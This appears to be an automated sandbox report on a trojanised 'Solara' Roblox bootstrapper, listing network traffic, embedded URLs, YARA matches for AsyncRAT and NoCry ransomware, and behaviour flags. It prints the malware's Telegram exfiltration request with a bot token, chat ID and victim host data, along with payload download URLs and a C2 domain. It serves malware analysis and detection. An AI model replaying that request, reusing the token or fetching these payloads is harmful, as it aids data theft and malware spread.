                      Source: global trafficHTTP traffic detected: GET /bot8013268995:AAHt5-BJsAIEM9hnoTy17y1WYC4NnCMU398/sendMessage?chat_id=5405936031&text=%E2%98%A0%20%5BXWorm%20V5.2%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A58ABE3825259C230781C%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%208TH9_M1_S%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.2 HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                      Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                      Source: Joe Sandbox ViewIP Address: 172.67.19.24 172.67.19.24
                      Source: Joe Sandbox ViewIP Address: 172.67.19.24 172.67.19.24
                      Source: Joe Sandbox ViewIP Address: 147.185.221.23 147.185.221.23
                      Source: Joe Sandbox ViewASN Name: TELEGRAMRU TELEGRAMRU
                      Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                      Source: Joe Sandbox ViewASN Name: SALSGIVERUS SALSGIVERUS
                      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49710 -> 104.21.93.27:443
                      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49707 -> 104.21.93.27:443
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global trafficHTTP traffic detected: GET /asset/discord.json HTTP/1.1Host: getsolara.devConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /raw/ZESVzSgK HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /api/endpoint.json HTTP/1.1Host: getsolara.dev
                      Source: global trafficHTTP traffic detected: GET /download/static/files/Bootstrapper.exe HTTP/1.1Host: 79c62fd6.solaraweb-alj.pages.devConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /asset/discord.json HTTP/1.1Host: getsolara.devConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /api/endpoint.json HTTP/1.1Host: getsolara.dev
                      Source: global trafficHTTP traffic detected: GET /v2/client-version/WindowsPlayer/channel/live HTTP/1.1Host: clientsettings.roblox.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /dist/v18.16.0/node-v18.16.0-x64.msi HTTP/1.1Host: www.nodejs.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /bot8013268995:AAHt5-BJsAIEM9hnoTy17y1WYC4NnCMU398/sendMessage?chat_id=5405936031&text=%E2%98%A0%20%5BXWorm%20V5.2%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A58ABE3825259C230781C%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%208TH9_M1_S%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.2 HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                      Source: global trafficDNS traffic detected: DNS query: getsolara.dev
                      Source: global trafficDNS traffic detected: DNS query: pastebin.com
                      Source: global trafficDNS traffic detected: DNS query: 79c62fd6.solaraweb-alj.pages.dev
                      Source: global trafficDNS traffic detected: DNS query: clientsettings.roblox.com
                      Source: global trafficDNS traffic detected: DNS query: www.nodejs.org
                      Source: global trafficDNS traffic detected: DNS query: nodejs.org
                      Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                      Source: global trafficDNS traffic detected: DNS query: cash-hispanic.gl.at.ply.gg
                      Source: global trafficDNS traffic detected: DNS query: settings-ssl.xboxlive.com
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 13 Oct 2024 17:09:02 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closex-frame-options: DENYx-frame-options: DENYx-content-type-options: nosniffx-content-type-options: nosniffx-xss-protection: 1;mode=blockx-xss-protection: 1;mode=blockcache-control: public, max-age=1801CF-Cache-Status: HITAge: 242Server: cloudflareCF-RAY: 8d20ef6379751977-EWR
                      Source: Bootstrapper.exe, 00000003.00000002.2134494144.00000247BF4AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:6463
                      Source: Bootstrapper.exe, 00000003.00000002.2134494144.00000247BF4AB000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000003.00000002.2134494144.00000247BF3B1000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.22.exe, 00000008.00000002.2521727635.000001AC8E551000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:6463/rpc?v=1
                      Source: Bootstrapper.exe, 00000003.00000002.2134494144.00000247BF4AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:64632
                      Source: Bootstrapper.exe, 00000003.00000002.2134494144.00000247BF54D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://79c62fd6.solaraweb-alj.pages.dev
                      Source: BootstrapperV1.22.exe, 00000008.00000002.2521727635.000001AC8E6E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://clientsettings.roblox.com
                      Source: powershell.exe, 00000005.00000002.2130997273.000001D47DF81000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mic
                      Source: powershell.exe, 00000005.00000002.2130997273.000001D47DF81000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micft.cMicRosof
                      Source: powershell.exe, 00000016.00000002.2441193901.00000201AB184000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
                      Source: svchost.exe, 0000001F.00000002.4500802078.0000014635800000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                      Source: BootstrapperV1.22.exe, 00000008.00000002.2521727635.000001AC8E6E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edge-term4-fra4.roblox.com
                      Source: svchost.exe, 0000001F.00000003.3606100140.00000146356B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                      Source: Bootstrapper.exe, 00000003.00000002.2134494144.00000247BF521000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000003.00000002.2134494144.00000247BF458000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.22.exe, 00000008.00000002.2521727635.000001AC8E604000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://getsolara.dev
                      Source: BootstrapperV1.22.exe, 00000008.00000000.2128272652.000001AC8C7A2000.00000002.00000001.01000000.0000000E.sdmpString found in binary or memory: http://james.newtonking.com/projects/json
                      Source: BootstrapperV1.22.exe, 00000008.00000002.2521727635.000001AC8E6E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nodejs.org
                      Source: powershell.exe, 00000005.00000002.2118096671.000001D4759B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2239684781.0000020035F95000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2379557085.000001DA74C95000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2617353264.00000201BCB74000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                      Source: Bootstrapper.exe, 00000003.00000002.2134494144.00000247BF4BA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pastebin.com
                      Source: powershell.exe, 00000016.00000002.2442020848.00000201ACD28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                      Source: powershell.exe, 00000005.00000002.2102713604.000001D465B69000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2167165138.0000020026149000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2290083728.000001DA64E48000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2442020848.00000201ACD28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                      Source: BootstrapperV21.exe, 00000002.00000002.4509858582.0000000002A71000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000003.00000002.2134494144.00000247BF43D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2102713604.000001D465941000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.22.exe, 00000008.00000002.2521727635.000001AC8E5E4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2167165138.0000020025F21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2290083728.000001DA64C21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2442020848.00000201ACB01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: powershell.exe, 00000005.00000002.2102713604.000001D465B69000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2167165138.0000020026149000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2290083728.000001DA64E48000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2442020848.00000201ACD28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                      Source: powershell.exe, 00000016.00000002.2442020848.00000201ACD28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                      Source: powershell.exe, 0000000D.00000002.2253701366.000002003E734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.c
                      Source: BootstrapperV1.22.exe, 00000008.00000002.2521727635.000001AC8E6E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.nodejs.org
                      Source: Bootstrapper.exe, 00000003.00000002.2134494144.00000247BF54D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://79c62fd6.solaraweb-alj.pages.dev
                      Source: BootstrapperV1.22.exe, 00000008.00000002.2521727635.000001AC8E6E6000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.22.exe, 00000008.00000002.2521727635.000001AC8E6C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://79c62fd6.solaraweb-alj.pages.dev/download/static/files/Bootstrapper.exe
                      Source: BootstrapperV1.22.exe, 00000008.00000002.2521727635.000001AC8E6E6000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.22.exe, 00000008.00000002.2521727635.000001AC8E6C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://79c62fd6.solaraweb-alj.pages.dev/download/static/files/Solara.Dir.zip
                      Source: powershell.exe, 00000005.00000002.2102713604.000001D465941000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2167165138.0000020025F21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2290083728.000001DA64C21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2442020848.00000201ACB01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                      Source: 8svMXMXNRn.exe, 00000000.00000003.2032035840.000001E9E40E4000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000003.00000000.2035830040.00000247BD6F2000.00000002.00000001.01000000.0000000A.sdmp, BootstrapperV1.22.exe, 00000008.00000002.2521727635.000001AC8E6E6000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.22.exe, 00000008.00000000.2128272652.000001AC8C7A2000.00000002.00000001.01000000.0000000E.sdmpString found in binary or memory: https://aka.ms/vs/17/release/vc_redist.x64.exe
                      Source: 8svMXMXNRn.exe, 00000000.00000003.2032035840.000001E9E40E4000.00000004.00000020.00020000.00000000.sdmp, BootstrapperV21.exe, 00000002.00000002.4509858582.0000000002A71000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV21.exe, 00000002.00000000.2035345072.0000000000752000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://api.telegram.org/bot
                      Source: BootstrapperV1.22.exe, 00000008.00000002.2521727635.000001AC8E6E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clientsettings.roblox.com
                      Source: BootstrapperV1.22.exe, 00000008.00000002.2521727635.000001AC8E6E6000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.22.exe, 00000008.00000002.2521727635.000001AC8E622000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.22.exe, 00000008.00000002.2521727635.000001AC8E6C4000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.22.exe, 00000008.00000002.2521727635.000001AC8E6D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clientsettings.roblox.com/v2/client-version/WindowsPlayer/channel/live
                      Source: powershell.exe, 00000016.00000002.2617353264.00000201BCB74000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                      Source: powershell.exe, 00000016.00000002.2617353264.00000201BCB74000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                      Source: powershell.exe, 00000016.00000002.2617353264.00000201BCB74000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                      Source: Bootstrapper.exe, 00000003.00000002.2134494144.00000247BF3B1000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.22.exe, 00000008.00000002.2521727635.000001AC8E551000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com
                      Source: 8svMXMXNRn.exe, 00000000.00000003.2032035840.000001E9E40E4000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000003.00000000.2035830040.00000247BD6F2000.00000002.00000001.01000000.0000000A.sdmp, BootstrapperV1.22.exe, 00000008.00000000.2128272652.000001AC8C7A2000.00000002.00000001.01000000.0000000E.sdmpString found in binary or memory: https://discord.com;http://127.0.0.1:6463/rpc?v=11
                      Source: svchost.exe, 0000001F.00000003.3606100140.0000014635723000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
                      Source: svchost.exe, 0000001F.00000003.3606100140.00000146356B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
                      Source: Bootstrapper.exe, 00000003.00000002.2134494144.00000247BF44E000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000003.00000002.2134494144.00000247BF521000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000003.00000002.2134494144.00000247BF43D000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.22.exe, 00000008.00000002.2521727635.000001AC8E64E000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.22.exe, 00000008.00000002.2521727635.000001AC8E5E4000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.22.exe, 00000008.00000002.2521727635.000001AC8E5FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getsolara.dev
                      Source: Bootstrapper.exe, 00000003.00000002.2134494144.00000247BF521000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000003.00000002.2134494144.00000247BF4BA000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.22.exe, 00000008.00000002.2521727635.000001AC8E64E000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.22.exe, 00000008.00000000.2128272652.000001AC8C7A2000.00000002.00000001.01000000.0000000E.sdmpString found in binary or memory: https://getsolara.dev/api/endpoint.json
                      Source: 8svMXMXNRn.exe, 00000000.00000003.2032035840.000001E9E40E4000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000003.00000000.2035830040.00000247BD6F2000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://getsolara.dev/api/endpoint.jsonChttps://pastebin.com/raw/ZESVzSgK
                      Source: 8svMXMXNRn.exe, 00000000.00000003.2032035840.000001E9E40E4000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000003.00000002.2134494144.00000247BF3B1000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000003.00000000.2035830040.00000247BD6F2000.00000002.00000001.01000000.0000000A.sdmp, BootstrapperV1.22.exe, 00000008.00000002.2521727635.000001AC8E551000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.22.exe, 00000008.00000002.2521727635.000001AC8E563000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.22.exe, 00000008.00000000.2128272652.000001AC8C7A2000.00000002.00000001.01000000.0000000E.sdmpString found in binary or memory: https://getsolara.dev/asset/discord.json
                      Source: BootstrapperV1.22.exe, 00000008.00000002.2521727635.000001AC8E64E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gist.githubusercontent.com/typeshi12/072784a0d3a602ed441a435d04c943b6/raw
                      Source: BootstrapperV1.22.exe, 00000008.00000000.2128272652.000001AC8C7A2000.00000002.00000001.01000000.0000000E.sdmpString found in binary or memory: https://gist.githubusercontent.com/typeshi12/072784a0d3a602ed441a435d04c943b6/rawChttps://pastebin.c
                      Source: BootstrapperV1.22.exe, 00000008.00000002.2521727635.000001AC8E551000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.22.exe, 00000008.00000000.2128272652.000001AC8C7A2000.00000002.00000001.01000000.0000000E.sdmpString found in binary or memory: https://gist.githubusercontent.com/typeshi12/29ef3a44a19235b08aaf229631c024d8/raw
                      Source: powershell.exe, 00000016.00000002.2442020848.00000201ACD28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                      Source: powershell.exe, 00000005.00000002.2122316030.000001D47DCB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.microsoft.co
                      Source: BootstrapperV1.22.exe, 00000008.00000002.2521727635.000001AC8E6E6000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.22.exe, 00000008.00000002.2521727635.000001AC8E6C0000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.22.exe, 00000008.00000002.2521727635.000001AC8E669000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ncs.roblox.com/upload
                      Source: BootstrapperV1.22.exe, 00000008.00000002.2521727635.000001AC8E6E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nodejs.org
                      Source: BootstrapperV1.22.exe, 00000008.00000002.2521727635.000001AC8E6E6000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.22.exe, 00000008.00000002.2521727635.000001AC8E6BC000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.22.exe, 00000008.00000002.2521727635.000001AC8E669000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nodejs.org/dist/v18.16.0/node-v18.16.0-x64.msi
                      Source: powershell.exe, 00000005.00000002.2118096671.000001D4759B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2239684781.0000020035F95000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2379557085.000001DA74C95000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2617353264.00000201BCB74000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                      Source: Bootstrapper.exe, 00000003.00000002.2134494144.00000247BF4BA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com
                      Source: Bootstrapper.exe, 00000003.00000002.2134494144.00000247BF4BA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/ZESVzSgK
                      Source: BootstrapperV1.22.exe, 00000008.00000002.2521727635.000001AC8E64E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/pjseRvyK
                      Source: BootstrapperV1.22.exe, 00000008.00000002.2521727635.000001AC8E6E6000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.22.exe, 00000008.00000002.2521727635.000001AC8E622000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.22.exe, 00000008.00000002.2521727635.000001AC8E6C4000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.22.exe, 00000008.00000002.2521727635.000001AC8E6D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://synapsexdocs.github.io/custom-lua-functions/console-functions/)
                      Source: BootstrapperV1.22.exe, 00000008.00000000.2128272652.000001AC8C7A2000.00000002.00000001.01000000.0000000E.sdmpString found in binary or memory: https://www.newtonsoft.com/jsonschema
                      Source: BootstrapperV1.22.exe, 00000008.00000002.2521727635.000001AC8E6E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.nodejs.org
                      Source: 8svMXMXNRn.exe, 00000000.00000003.2032035840.000001E9E40E4000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000003.00000000.2035830040.00000247BD6F2000.00000002.00000001.01000000.0000000A.sdmp, BootstrapperV1.22.exe, 00000008.00000002.2521727635.000001AC8E6E6000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.22.exe, 00000008.00000000.2128272652.000001AC8C7A2000.00000002.00000001.01000000.0000000E.sdmpString found in binary or memory: https://www.nodejs.org/dist/v18.16.0/node-v18.16.0-x64.msi
                      Source: 8svMXMXNRn.exe, 00000000.00000003.2032035840.000001E9E40E4000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000003.00000000.2035830040.00000247BD6F2000.00000002.00000001.01000000.0000000A.sdmp, BootstrapperV1.22.exe, 00000008.00000000.2128272652.000001AC8C7A2000.00000002.00000001.01000000.0000000E.sdmpString found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49999 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49999
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                      Source: unknownHTTPS traffic detected: 104.21.93.27:443 -> 192.168.2.5:49704 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.5:49706 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.93.27:443 -> 192.168.2.5:49707 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.66.44.59:443 -> 192.168.2.5:49708 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.93.27:443 -> 192.168.2.5:49709 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.93.27:443 -> 192.168.2.5:49710 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 128.116.44.3:443 -> 192.168.2.5:49711 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.20.23.46:443 -> 192.168.2.5:49712 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49999 version: TLS 1.2

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      barindex
                      Contains functionality to capture screen (.Net source)
                      Source: 2.2.BootstrapperV21.exe.1b4c0000.3.raw.unpack, RemoteDesktop.cs.Net Code: GetScreen

                      Spam, unwanted Advertisements and Ransom Demands

                      barindex
                      Yara detected NoCry Ransomware
                      Source: Yara matchFile source: Process Memory Space: BootstrapperV21.exe PID: 6524, type: MEMORYSTR

                      Operating System Destruction

                      barindex
                      Protects its processes via BreakOnTermination flag
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeProcess information set: 01 00 00 00 Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\TrojanXD.exeProcess information set: 01 00 00 00

                      System Summary

                      barindex
                      Malicious sample detected (through community Yara rule)
                      Source: 2.0.BootstrapperV21.exe.750000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: 00000000.00000003.2032035840.000001E9E40E4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: 00000002.00000000.2035345072.0000000000752000.00000002.00000001.01000000.00000009.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: C:\Users\user\AppData\Roaming\explorer.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
                      Windows Scripting host queries suspicious COM object (likely to drop second stage)
                      Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeProcess Stats: CPU usage > 49%
                      Source: C:\Users\user\AppData\Local\Temp\TrojanXD.exeCode function: 34_2_00007FF848C50A5A NtSetInformationProcess,34_2_00007FF848C50A5A
                      Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeCode function: 39_2_00000207DE5869B2 NtQuerySystemInformation,39_2_00000207DE5869B2
                      Source: C:\Users\user\Desktop\8svMXMXNRn.exeCode function: 0_2_00007FF63739C2F0: CreateFileW,CloseHandle,wcscpy,wcscpy,wcscpy,wcscpy,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF63739C2F0
                      Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                      Source: C:\Users\user\Desktop\8svMXMXNRn.exeCode function: 0_2_00007FF63739F9300_2_00007FF63739F930
                      Source: C:\Users\user\Desktop\8svMXMXNRn.exeCode function: 0_2_00007FF6373A49280_2_00007FF6373A4928
                      Source: C:\Users\user\Desktop\8svMXMXNRn.exeCode function: 0_2_00007FF6373C07540_2_00007FF6373C0754
                      Source: C:\Users\user\Desktop\8svMXMXNRn.exeCode function: 0_2_00007FF6373B34840_2_00007FF6373B3484
                      Source: C:\Users\user\Desktop\8svMXMXNRn.exeCode function: 0_2_00007FF6373AA4AC0_2_00007FF6373AA4AC
                      Source: C:\Users\user\Desktop\8svMXMXNRn.exeCode function: 0_2_00007FF6373BB1900_2_00007FF6373BB190
                      Source: C:\Users\user\Desktop\8svMXMXNRn.exeCode function: 0_2_00007FF6373BCE880_2_00007FF6373BCE88
                      Source: C:\Users\user\Desktop\8svMXMXNRn.exeCode function: 0_2_00007FF6373B1F200_2_00007FF6373B1F20
                      Source: C:\Users\user\Desktop\8svMXMXNRn.exeCode function: 0_2_00007FF637395E240_2_00007FF637395E24
                      Source: C:\Users\user\Desktop\8svMXMXNRn.exeCode function: 0_2_00007FF6373948400_2_00007FF637394840
                      Source: C:\Users\user\Desktop\8svMXMXNRn.exeCode function: 0_2_00007FF6373CC8380_2_00007FF6373CC838
                      Source: C:\Users\user\Desktop\8svMXMXNRn.exeCode function: 0_2_00007FF6373976C00_2_00007FF6373976C0
                      Source: C:\Users\user\Desktop\8svMXMXNRn.exeCode function: 0_2_00007FF6373D25500_2_00007FF6373D2550
